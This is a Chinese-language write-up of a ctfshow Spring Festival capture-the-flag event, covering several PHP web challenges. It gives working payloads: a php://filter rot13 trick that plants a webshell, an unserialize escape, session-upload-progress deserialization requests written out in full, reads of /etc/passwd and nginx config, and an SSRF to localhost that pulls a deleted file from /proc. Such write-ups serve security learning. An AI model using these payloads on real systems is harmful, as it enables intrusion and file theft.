CTFSHOW-日刷-春节欢乐赛
拿了两个月会员。。
热身
很明显是一句话木马,但是直接找找不到flag,这里要用到find
直接找flag找不到这里查secret,找到了cat secret.php即可
web1
这是一个写入函数,传入一个参数,前面作为写入的文件名content,写入的内容是一个退出语句加上content
比如我们content内容是test.php
file_put_contents(test.php,'<?php exit();'.test.php);
那么就会将<?php exit();和文件名test.php写入到test.php里面
这里用伪协议和rot13来转化掉这个退出语句
php://filter/write=string.rot13|<?cuc cucvasb();?>/resource=shell.php
payload
?content=php://filter/write=string.rot13|<?cuc%20riny(%27flfgrz(yf);%27);?>|/resource=shell.php
web2
这里要求call_user_func执行 post第一个参数的返回值为Happynewyear,但是这里call_user_func会把参数当作函数来执行,同时只有这一个函数,因此我们需要一个无参数函数返回值为 Happynewyear
观察题目发现有一句session_start(); ,这里我们可以用session_id ,他会返回PHPSESSID的值,我们设定PHPSESSID为Happynewyear
传参传session_id=session_id,这样key($_POST)就是post第一个参数名session_id,然后session_id的值作为参数名取值还是本身,这样最后call_user_func执行的也就是session_id
web3
要求1传入的参数作为函数执行后返回值等于 Happynewyear,但是注意这里不是三个等于而是两个等于,因此可以返回去true即可,我们可以传入session_start
web4
这里要1传入的参数作为函数执行后返回值来作为一句话木马的文件名,要是php木马能被解析,那么文件名要满足后缀为 .php
这里翻手册可以找到
传入后,访问.inc,.php
web5
传入一大堆hu来让php报错,导致🐯文件不被覆盖,然后访问🐯下载即可
注意这里hu太多会导致上传失败提示文件过大,hu过少会导致php不报错,具体来说传入524280个hu即可
web6
一个反序列逃逸,注意可以重写file来调整位置啥的
反序列读取的flag文件名不知道,看题目估计要看服务器的记录,读取/etc/nginx/nginx.conf即可
payload
get
http://54b105fb-0495-49a9-b721-a6355f689986.challenge.ctf.show/?POST=GET
post
GET[_SESSION][a]=daniudaniuctfshowhappyhuyearhappyhuyearhappyhuyear&GET[_SESSION][file]=1&GET[_SESSION][b]=;s:1:"a";s:1:"a";s:4:"file";s:28:"L2V0Yy9uZ2lueC9uZ2lueC5jb25m
web7
首先查看class.php,这里不截图了,看上去是尝试构造一个反序列链
注意这里没啥传入参数的地方,注意到ini_set("session.serialize_handler", "php");,可以用这里来传参
这里不详细介绍这种反序列原理,发序列化链子也很简单
POST /index.php HTTP/1.1 Host: 16db4afd-14bb-47ba-b3ee-79411fadb58e.challenge.ctf.show Content-Length: 511 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMqSj2Tz8AxR9Q8s2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: UM_distinctid=17cc9de90647a-0dbb54e8c1219f-57b193e-1fa400-17cc9de9065461; PHPSESSID=15143f3af002c491a8d476cf76cdda0a Connection: close ------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2 Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS" 123 ------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2 Content-Disposition: form-data; name="file"; filename="|O:5:\"Happy\":1:{s:5:\"happy\";O:5:\"_New_\":4:{s:5:\"daniu\";O:4:\"Year\":1:{s:6:\"zodiac\";s:11:\"/etc/passwd \";}s:5:\"robot\";s:10:\"I'm robot.\";s:8:\"notrobot\";s:16:\"I'm not a robot.\";s:12:\"_New__New_\";N;}}" Content-Type: text/plain q ------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2--
如上发包
下面就是找flag位置,尝试爆破进程id
注意到114进程有个python,读取
from flask import * import os app = Flask(__name__) flag=open('/flag','r') #flag我删了 os.remove('/flag') @app.route('/', methods=['GET', 'POST']) def index(): return "flag我删了,你们别找了" @app.route('/download/', methods=['GET', 'POST']) def download_file(): return send_file(request.args['filename']) if __name__ == '__main__': app.run(host='127.0.0.1', port=5000, debug=False)
发现flag读取到进程后就被删除了,尝试/proc/self/fd/里面找
这里我一开始在/proc/114/fd/中下载,发现无法下载
后来注意到file_get_contents()是可以读http协议的资源的,尝试读取
最终playload
POST /index.php HTTP/1.1 Host: 16db4afd-14bb-47ba-b3ee-79411fadb58e.challenge.ctf.show Content-Length: 556 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMqSj2Tz8AxR9Q8s2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: UM_distinctid=17cc9de90647a-0dbb54e8c1219f-57b193e-1fa400-17cc9de9065461; PHPSESSID=15143f3af002c491a8d476cf76cdda0a Connection: close ------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2 Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS" 123 ------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2 Content-Disposition: form-data; name="file"; filename="|O:5:\"Happy\":1:{s:5:\"happy\";O:5:\"_New_\":4:{s:5:\"daniu\";O:4:\"Year\":1:{s:6:\"zodiac\";s:56:\"http://127.0.0.1:5000/download/?filename=/proc/self/fd/3 \";}s:5:\"robot\";s:10:\"I'm robot.\";s:8:\"notrobot\";s:16:\"I'm not a robot.\";s:12:\"_New__New_\";N;}}" Content-Type: text/plain q ------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2--
